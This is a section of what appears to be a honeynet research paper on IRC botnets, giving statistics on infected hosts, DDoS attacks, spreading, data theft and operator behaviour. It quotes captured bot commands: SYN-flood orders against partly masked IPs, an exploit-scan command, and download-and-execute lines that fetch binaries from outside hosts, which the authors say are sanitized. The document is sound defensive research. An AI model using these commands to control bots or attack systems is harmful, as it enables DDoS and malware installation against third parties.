Lessons Learned

In this section we present some of the findings we obtained through our observation of botnets. Data is sanitized so that it does not allow one to draw any conclusions about specific attacks against a particular system, and protects the identity and privacy of those involved. Also, as the data for this paper was collected in Germany by the German Honeynet Project, information about specific attacks and compromised systems was forwarded to DFN-CERT (Computer Emergency Response Team) based in Hamburg, Germany. We would like to start with some statistics about the botnets we have observed in the last few months:

  • Number of botnets
    We were able to track little more than 100 botnets during the last four months. Some of them "died" (e.g. main IRC server down or inexperienced attacker) and at the moment we are tracking about 35 active botnets.
  • Number of hosts
    During these few months, we saw 226,585 unique IP addresses joining at least one of the channels we monitored. Seeing an IP means here that the IRCd was not modified to not send us an JOIN message for each joining client. If an IRCd is modified not to show joining clients in a channel, we don't see IPs here. Furthermore some IRCds obfuscate the joining clients IP address and obfuscated IP addresses do not count as seen, too. This shows that the threat posed by botnets is probably worse than originally believed. Even if we are very optimistic and estimate that we track a significant percentage of all botnets and all of our tracked botnet IRC servers are not modified to hide JOINs or obfuscate the joining clients IPs, this would mean that more then one million hosts are compromised and can be controlled by malicious attackers. We know there are more botnet clients since the attackers sometimes use modified IRC servers that do not give us any information about joining users.
  • Typical size of Botnets
    Some botnets consist of only a few hundred bots. In contrast to this, we have also monitored several large botnets with up to 50.000 hosts. The actual size of such a large botnet is hard to estimate. Often the attackers use heavily modified IRC servers and the bots are spread across several IRC servers. We use link-checking between IRCds to detect connections between different botnets that form one large botnet. Thus we are able to approximate the actual size. Keep in mind, botnets with over several hundred thousands hosts have been reported in the past. If a botnet consists of more than 5 linked IRC servers, we simply say it is large even if we are not able to determine a numerical number as the IRCd software is stripped down. As a side note: We know about a home computer which got infected by 16 (sic!) different bots, so its hard to make an estimation about world bot population here.
  • Dimension of DDoS-attacks
    We are able to make an educated guess about the current dimension of DDoS-attacks caused by botnets. We can observe the commands issued by the controllers and thus see whenever the botnet is used for such attacks. From the beginning of November 2004 until the end of January 2005, we were able to observe 226 DDoS-attacks against 99 unique targets. Often these attacks targeted dial-up lines, but there are also attacks against bigger websites. In order to point out the threat posed by such attacks, we present the collected data about DDoS-attacks on a separate page. "Operation Cyberslam" documents one commercial DDoS run against competitors in online selling.

    A typical DDoS-attacks looks like the following examples: The controller enters the channel and issues the command (sometimes even stopping further spreading of the bots). After the bots have done their job, they report their status:

    [###FOO###] <~nickname> .scanstop
    [###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200
    [###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds
    [...]
    [###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec).
    [###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec).
    [###FOO###] <-[XP]-62444> [DDoS]: Done with flood (1327KB/sec).
    [###FOO###] <-[2K]-38291> [DDoS]: Done with flood (714KB/sec).
    [...]
    [###FOO###] <~nickname> .login 12345
    [###FOO###] <~nickname> .ddos.syn 213.202.217.XXX 6667 200
    [###FOO###] <-[XP]-18230> [DDoS]: Flooding: (213.202.217.XXX:6667) for 200 seconds.
    [...]
    [###FOO###] <-[XP]-18320> [DDoS]: Done with flood (0KB/sec).
    [###FOO###] <-[2K]-33830> [DDoS]: Done with flood (2288KB/sec).
    [###FOO###] <-[XP]-86870> [DDoS]: Done with flood (351KB/sec).
    [###FOO###] <-[XP]-62644> [DDoS]: Done with flood (1341KB/sec).
    [###FOO###] <-[2K]-34891> [DDoS]: Done with flood (709KB/sec).
    [...]

    Both attacks show typical targets of DDoS-attacks: FTP server on port 21/TCP or IRC server on port 6667/TCP.

  • Spreading of botnets
    ".advscan lsass 150 5 0 -r -s" and other commands are the most frequent observed messages. Through this and similar commands, bots spread and search for vulnerable systems. Commonly, Windows systems are exploited and thus we see most traffic on typical Windows ports (e.g. for CIFS based file sharing). We have analyzed this in more detail and present these results on a page dedicated to spreading of bots.
  • Harvesting of information
    Sometimes we can also observe the harvesting of information from all compromised machines. With the help of a command like ".getcdkeys" the operator of the botnet is able to request a list of CD-keys (e.g. for Windows or games) from all bots. This CD-keys can be sold to crackers or the attacker can use them for several other purposes since they are considered valuable information. These operations are seldom, though.
  • "Updates" within botnets
    We also observed updates of botnets quite frequently. Updating in this context means that the bots are instructed to download a piece of software from the Internet and then execute it. Examples of issued commands include:

    .download http://spamateur.freeweb/space.com/leetage/gamma.exe c:\windows\config\gamma.exe 1
    .download http://www.spaztenbox.net/cash.exe c:\arsetup.exe 1 -s
    !down http://www.angelfire.com/linuks/kuteless/ant1.x C:\WINDOWS\system32\drivers\disdn\anti.exe 1
    ! dload http://www.angelfire.com/linuks/kuteless/ant1.x C:\firewallx.exe 1
    .http.update http://59.56.178.20/~mugenxur/rBot.exe c:\msy32awds.exe 1
    .http.update http://m1cr0s0ftw0rdguy.freesuperhost.com/jimbo.jpg %temp%\vhurdx.exe -s

    (Note:We sanitized the links so the code is not accidently downloaded/executed)

    As you can see, the attackers use diverse webspace providers and often obfuscate the downloaded binary. The parameter "1" in the command tells the bots to execute the binary once they have downloaded it. This way, the bots can be dynamically updated and be further enhanced. We also collect the malware that the bots download and further analyze it if possible. In total, we have collected 329 binaries. 201 of these files are malware as an analysis with "Kaspersky Anti-Virus On-Demand Scanner for Linux" shows:

         28 Backdoor.Win32.Rbot.gen
         27 Backdoor.Win32.SdBot.gen
         22 Trojan-Dropper.Win32.Small.nm
         15 Backdoor.Win32.Brabot.d
         10 Backdoor.Win32.VB.uc
          8 Trojan.WinREG.LowZones.a
          6 Backdoor.Win32.Iroffer.b
          5 Trojan.Win32.LowZones.q
          5 Trojan-Downloader.Win32.Small.qd
          5 Backdoor.Win32.Agobot.gen
          4 Virus.Win32.Parite.b
          4 Trojan.Win32.LowZones.p
          4 Trojan.BAT.Zapchast
          4 Backdoor.Win32.Wootbot.gen
          4 Backdoor.Win32.ServU-based
          4 Backdoor.Win32.SdBot.lt
          3 Trojan.Win32.LowZones.d
          3 Trojan-Downloader.Win32.Agent.gd
          2 Virus.BAT.Boho.a
          2 VirTool.Win32.Delf.d
          2 Trojan-Downloader.Win32.Small.ads
          2 HackTool.Win32.Clearlog
          2 Backdoor.Win32.Wootbot.u
          2 Backdoor.Win32.Rbot.af
          2 Backdoor.Win32.Iroffer.1307
          2 Backdoor.Win32.Iroffer.1221
          2 Backdoor.Win32.HacDef.084
          1 Trojan.Win32.Rebooter.n
          1 Trojan.Win32.LowZones.ab
          1 Trojan.Win32.KillFiles.hb
          1 Trojan-Spy.Win32.Quakart.r
          1 Trojan-Proxy.Win32.Ranky.aw
          1 Trojan-Proxy.Win32.Agent.cl
          1 Trojan-Downloader.Win32.Zdown.101
          1 Trojan-Downloader.Win32.IstBar.gv
          1 Trojan-Downloader.Win32.IstBar.er
          1 Trojan-Downloader.Win32.Agent.dn
          1 Trojan-Clicker.Win32.Small.bw
          1 Trojan-Clicker.Win32.Agent.bi
          1 Net-Worm.Win32.DipNet.f
          1 HackTool.Win32.Xray.a
          1 HackTool.Win32.FxScanner
          1 Backdoor.Win32.Wootbot.ab
          1 Backdoor.Win32.Wisdoor.at
          1 Backdoor.Win32.Spyboter.gen
          1 Backdoor.Win32.Rbot.ic
          1 Backdoor.Win32.Rbot.fo
          1 Backdoor.Win32.Optix.b
          1 Backdoor.Win32.Agent.ds

    Most of the other binary files are either adware (a program that displays banners while being run, or reports users habits or information to third parties), proxy servers (a computer process that relays a protocol between client and server computer systems) or Browser Helper Objects.

An event that is not that unusual is that somebody steals a botnet from someone else. It can be somewhat humorous to observe several competing attackers. As mentioned before, bots are often "secured" by some sensitive information, e.g. channel name or server password. If one is able to obtain all this information, he is able to update the bots within another botnet to another bot binary, thus stealing the bots from another botnet. For example, some time ago we could monitor when the controller of Botnet #12 stole bots from the seemingly abandoned Botnet #25.

We recently had a very unusual update run on one of our monitored botnets: Everything went fine, the botnet master authenticated successfully and issued the command to download and execute the new file. Our client drone downloaded the file and it got analyzed, we set up a client with the special crafted nickname, ident, and user info. But then our client could not connect
to the IRC server to join the new channel. The first character of the nickname was invalid to use on that IRCd software. This way, the (somehow dumb) attacker just lost about 3,000 bots which hammer their server with connect tries forever.

Something which is interesting, but rarely seen, is botnet owners discussing issues in their bot channel. We observed several of those talks and learned more about their social life this way. We once observed a small shell hoster hosting a botnet on his own servers and DDoSing competitors. These people chose the same nicknames commanding the botnet as giving support for their shell accounts in another IRC network. Furthermore, some people who run botnets offer an excellent pool of information about themselves as they do not use free and anonymous webhosters to run updates on their botnets. These individuals demonstrate how even unskilled people can run and leverage a botnet.

Our observations showed that often botnets are run by young males with surprisingly limited programming skills. The scene forums are crowded of posts like "How can i compile *" and similar questions. These people often achieve a good spread of their bots, but their actions are more or less harmless. Nevertheless, we also observed some more advanced attackers: these persons join the control channel only seldom. They use only 1 character nicks, issue a command and leave afterwards. The updates of the bots they run are very professional. Probably these people use the botnets for commercial usage and "sell" the services. A low percentage use their botnets for financial gain. For example, by installing Browser Helper Objects for companies tracking/fooling websurfers or clicking pop-ups. A very small percentage of botnet runners seems highly skilled, they strip down their IRCd software to a non RFC compliant daemon, not even allowing standard IRC clients to connect.

Another possibility is to install special software to steal information. We had one very interesting case in which attackers stole Diablo 2 items from the compromised computers and sold them on eBay. Diablo 2 is a online game in which you can improve your character by collecting powerful items. The more seldom an item is, the higher is the price on eBay. A search on eBay for Diablo 2 shows that some of these items allow an attacker to make a nice profit. Some botnets are used to send spam: you can rent a botnet. The operators give you a SOCKS v4 server list with the IP addresses of the hosts and the ports their proxy runs on. There are documented cases where botnets were sold to spammers as spam relays: "Uncovered: Trojans as Spam Robots ". You can see an example of an attacker installing software (in this case rootkits) in a captured example.